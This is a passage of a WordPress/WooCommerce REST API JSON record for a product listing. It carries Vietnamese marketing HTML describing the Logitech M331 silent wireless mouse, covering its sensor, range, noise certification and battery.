c\u1ea7n thi\u1ebft. B\u00ean c\u1ea1nh \u0111\u00f3, ch\u1ea5t li\u1ec7u nh\u1ef1a c\u1ee9ng b\u1ec1n b\u1ec9 song c\u0169ng cho ng\u01b0\u1eddi d\u00f9ng c\u1ea3m gi\u00e1c s\u1eed d\u1ee5ng c\u1ea7m n\u1eb1m nh\u1eb9 nh\u00e0ng \u0111\u1ebfn m\u1ee9c b\u1ea1n c\u00f3 th\u1ec3 c\u1ea7m g\u1ecdn trong l\u00f2ng b\u00e0n tay nh\u01b0ng v\u1eabn cho c\u1ea3m gi\u00e1c s\u1eed d\u1ee5ng tho\u1ea3i m\u00e1i nh\u1ea5t.<\/p>\n<h3 id=\"chuot-quang-do-phan-giai-len-den-1000dpi-ket-noi-khong-day-voi-khoang-cach-10m\">Chu\u1ed9t quang \u0111\u1ed9 ph\u00e2n gi\u1ea3i l\u00ean \u0111\u1ebfn 1000dpi, k\u1ebft n\u1ed1i kh\u00f4ng d\u00e2y v\u1edbi kho\u1ea3ng c\u00e1ch 10m<\/h3>\n<p>S\u1ea3n ph\u1ea9m \u0111\u01b0\u1ee3c trang b\u1ecb c\u00f4ng ngh\u1ec7 chu\u1ed9t quang ti\u00ean ti\u1ebfn cho \u0111\u1ed9 ph\u00e2n gi\u1ea3i l\u00ean \u0111\u1ebfn 1000dpi. \u0110\u00e2y l\u00e0 \u0111\u1ed9 ph\u00e2n gi\u1ea3i cao. Qua \u0111\u00f3, gi\u00fap cho\u00a0<a title=\"chu\u1ed9t LOGITECH\" href=\"https:\/\/cellphones.com.vn\/phu-kien\/chuot-ban-phim-may-tinh\/chuot\/logitech.html\" target=\"_blank\" rel=\"noopener\"><strong>chu\u1ed9t\u00a0Logitech<\/strong><\/a>\u00a0c\u00f3 th\u1ec3 di chuy\u1ec3n nhanh v\u00e0 m\u01b0\u1ee3t m\u00e0 tr\u00ean nhi\u1ec1u b\u1ec1n m\u1eb7t, \u0111\u1ea3m b\u1ea3o hi\u1ec7u qu\u1ea3 cho c\u00f4ng vi\u1ec7c, h\u1ecdc t\u1eadp c\u0169ng nh\u01b0 gi\u1ea3i tr\u00ed.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn2.cellphones.com.vn\/insecure\/rs:fill:0:0\/q:90\/plain\/https:\/\/cellphones.com.vn\/media\/wysiwyg\/phu-kien\/chuot\/Logitech\/chuot-khong-day-logitech-m331-2.jpg\" alt=\"Chu\u1ed9t Logitech M331 \u2013 Thi\u1ebft k\u1ebf si\u00eau nh\u1ecf g\u1ecdn, \u0111\u1ed9 ph\u00e2n gi\u1ea3i c\u1ea3m bi\u1ebfn 1000 DPI\" \/><\/p>\n<p>Ng\u01b0\u1eddi d\u00f9ng c\u00f3 \u0111\u01b0\u1ee3c k\u1ebft n\u1ed1i tin c\u1eady c\u1ee7a s\u1ea3n ph\u1ea9m c\u00f3 d\u00e2y nh\u01b0ng l\u1ea1i thu\u1eadn ti\u1ec7n v\u1edbi t\u00ednh n\u0103ng kh\u00f4ng d\u00e2y. \u0110i\u1ec1u n\u00e0y mang l\u1ea1i s\u1ef1 t\u1ef1 do v\u1edbi kho\u1ea3ng c\u00e1ch truy\u1ec1n d\u1eef li\u1ec7u nhanh ch\u00f3ng l\u00ean \u0111\u1ebfn 10m v\u00e0 h\u1ea7u nh\u01b0 kh\u00f4ng b\u1ecb tr\u1ec5 ho\u1eb7c m\u1ea5t k\u1ebft n\u1ed1i. Gi\u1edd \u0111\u00e2y, b\u1ea1n c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng kh\u00f4ng kh\u00e1c g\u00ec m\u1ed9t ch\u00fa chu\u1ed9t c\u00f3 d\u00e2y k\u1ebft n\u1ed1i.<\/p>\n<p>Xem th\u00eam : Chu\u1ed9t kh\u00f4ng d\u00e2y\u00a0<strong><a title=\"Logitech M185\" href=\"https:\/\/cellphones.com.vn\/chuot-khong-day-logitech-m185.html\" target=\"_blank\" rel=\"noopener\">Logitech M185<\/a><\/strong>\u00a0gi\u00e1 t\u1ed1t, b\u1ec1n, \u0111\u1eb9p<\/p>\n<h3 id=\"chung-nhan-quiet-mark-khong-gay-ra-tieng-dong-khi-su-dung\">Ch\u1ee9ng nh\u1eadn Quiet Mark kh\u00f4ng g\u00e2y ra ti\u1ebfng \u0111\u1ed9ng khi s\u1eed d\u1ee5ng<\/h3>\n<p>Logitech l\u00e0 c\u00f4ng ty s\u1ea3n xu\u1ea5t chu\u1ed9t \u0111\u1ea7u ti\u00ean tr\u00ean th\u1ebf gi\u1edbi nh\u1eadn \u0111\u01b0\u1ee3c ch\u1ee9ng nh\u1eadn Quiet Mark certification. N\u00f3 \u0111\u01b0\u1ee3c \u0111\u00f3ng d\u1ea5u ph\u00ea duy\u1ec7t qu\u1ed1c t\u1ebf do Hi\u1ec7p h\u1ed9i Gi\u1ea3m Ti\u1ebfng \u1ed3n c\u1ee7a V\u01b0\u01a1ng qu\u1ed1c Anh (UK Noise Abatement Society) c\u00f4ng nh\u1eadn c\u00f4ng ngh\u1ec7 \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf \u0111\u1ec3 gi\u1ea3m \u1ed3n.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn2.cellphones.com.vn\/insecure\/rs:fill:0:0\/q:90\/plain\/https:\/\/cellphones.com.vn\/media\/wysiwyg\/phu-kien\/chuot\/Logitech\/chuot-khong-day-logitech-m331-3.jpg\" alt=\"Chu\u1ed9t Logitech M331 \u2013 Thi\u1ebft k\u1ebf si\u00eau nh\u1ecf g\u1ecdn, \u0111\u1ed9 ph\u00e2n gi\u1ea3i c\u1ea3m bi\u1ebfn 1000 DPI\" \/><\/p>\n<p>Ch\u1ee9ng nh\u1eadn n\u00e0y \u0111\u01b0\u1ee3c x\u00e1c th\u1ef1c t\u1eeb nh\u1eefng c\u00f4ng ngh\u1ec7 \u0111\u01b0\u1ee3c t\u00edch h\u1ee3p b\u00ean trong chu\u1ed9t silent kh\u00f4ng d\u00e2y n\u00e0y \u0111\u00e3 l\u00e0m gi\u1ea3m h\u01a1n 90% ti\u1ebfng \u1ed3n. Bao g\u1ed3m ch\u00e2n \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf m\u1ed9t c\u00e1ch b\u1ec1n b\u1ec9, hi\u1ec7u su\u1ea5t l\u01b0\u1edbt cao \u00eam tr\u00ean b\u00e0n l\u00e0m vi\u1ec7c, ph\u1ea7n b\u00e1nh xe cu\u1ed9n c\u1ee7a chu\u1ed9t laser kh\u00f4ng d\u00e2y cu\u1ed9n r\u1ea5t \u00eam \u00e1i b\u1ed5 sung tr\u1ecdn v\u1eb9n cho tr\u1ea3i nghi\u1ec7m y\u00ean l\u1eb7ng c\u1ee7a b\u1ea1n v\u00e0 nh\u1eefng ng\u01b0\u1eddi xung quanh, silent click gi\u1ea3m h\u01a1n 90% ti\u1ebfng nh\u1ea5p chu\u1ed9t.<\/p>\n<h3 id=\"tuong-thich-tot-nhieu-he-dieu-hanh-pin-aa-tien-dung\">T\u01b0\u01a1ng th\u00edch t\u1ed1t nhi\u1ec1u h\u1ec7 \u0111i\u1ec1u h\u00e0nh, pin AA ti\u1ec7n d\u1ee5ng<\/h3>\n<p>Chu\u1ed9t kh\u00f4ng d\u00e2y M331 ho\u1ea1t \u0111\u1ed9ng t\u1ed1t v\u1edbi c\u00e1c m\u00e1y t\u00ednh ch\u1ea1y Windows, Mac, Chrome OS ho\u1eb7c Linux. \u0110\u1ea7u thu r\u1ea5t nh\u1ecf v\u00e0 kh\u00f4ng t\u1ed1n di\u1ec7n t\u00edch, vi\u1ec7c c\u1ea7n l\u00e0m l\u00e0 ch\u1ec9 c\u1ea7n c\u1eafm v\u00e0o c\u1ed5ng\u00a0USB\u00a0v\u00e0o m\u00e1y t\u00ednh v\u00e0 kh\u00f4ng c\u1ea7n \u0111\u1ec3 quan t\u00e2m g\u00ec n\u1eefa. Th\u00eam v\u00e0o \u0111\u00f3, b\u1ea1n s\u1ebd kh\u00f4ng c\u00f2n ph\u1ea3i lo s\u1ee3 m\u1ea5t \u0111\u1ea7u thu v\u00ec b\u1ea1n kh\u00f4ng c\u1ea7n ph\u1ea3i th\u00e1o ra g\u1eafn v\u00e0o.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn2.cellphones.com.vn\/insecure\/rs:fill:0:0\/q:90\/plain\/https:\/\/cellphones.com.vn\/media\/wysiwyg\/phu-kien\/chuot\/Logitech\/chuot-khong-day-logitech-m331-4.jpg\" alt=\"Chu\u1ed9t Logitech M331 \u2013 Thi\u1ebft k\u1ebf si\u00eau nh\u1ecf g\u1ecdn, \u0111\u1ed9 ph\u00e2n gi\u1ea3i c\u1ea3m bi\u1ebfn 1000 DPI\" \/><\/p>\n<p>Chu\u1ed9t Logitech M331 c\u00f3 th\u1ec3 ho\u1ea1t \u0111\u1ed9ng li\u00ean t\u1ee5c v\u00e0 ti\u1ec7n d\u1ee5ng v\u1edbi pin AA. \u0110i\u1ec1u n\u00e0y gi\u00fap b\u1ea1n ti\u1ebft ki\u1ec7m chi ph\u00ed h\u01a1n v\u00e0 kh\u00f4ng c\u00f2n lo l\u1eafng c\u00f4ng vi\u1ec7c b\u1ecb gi\u00e1n \u0111o\u1ea1n gi\u1eefa ch\u1eebng. Ngo\u00e0i ra, chu\u1ed9t c\u0169ng s\u1ebd t\u1ef1 \u0111\u1ed9ng ng\u1eaft khi b\u1ea1n kh\u00f4ng s\u1eed d\u1ee5ng n\u1eefa nh\u1eb1m ti\u1ebft ki\u1ec7m n\u0103ng l\u01b0\u1ee3ng.<\/p>\n","protected":false},"featured_media":3205,"comment_status":"open","ping_status":"closed","template":"","meta":{"_acf_changed":false},"product_cat":[148],"product_tag":[],"class_list":{"0":"post-1776","1":"product","2":"type-product","3":"status-publish","6":"product_cat-chuot-may-tinh","8":"first","9":"instock","10":"shipping-taxable","11":"purchasable","12":"product-type-simple"},"acf":[],"_links":{"self":[{"href":"https:\/\/procurement.wvvd.org\/index.php\/wp-json\/wp\/v2\/product\/1776","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/procurement.wvvd.org\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/procurement.wvvd.org\/index.php\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/procurement.wvvd.org\/index.php\/wp-json\/wp\/v2\/comments?post=1776"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/procurement.wvvd.org\/index.php\/wp-json\/wp\/v2\/media\/3205"}],"wp:attachment":[{"href":"https:\/\/procurement.wvvd.org\/index.php\/wp-json\/wp\/v2\/media?parent=1776"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/procurement.wvvd.org\/index.php\/wp-json\/wp\/v2\/product_cat?post=1776"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/procurement.wvvd.org\/index.php\/wp-json\/wp\/v2\/product_tag?post=1776"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}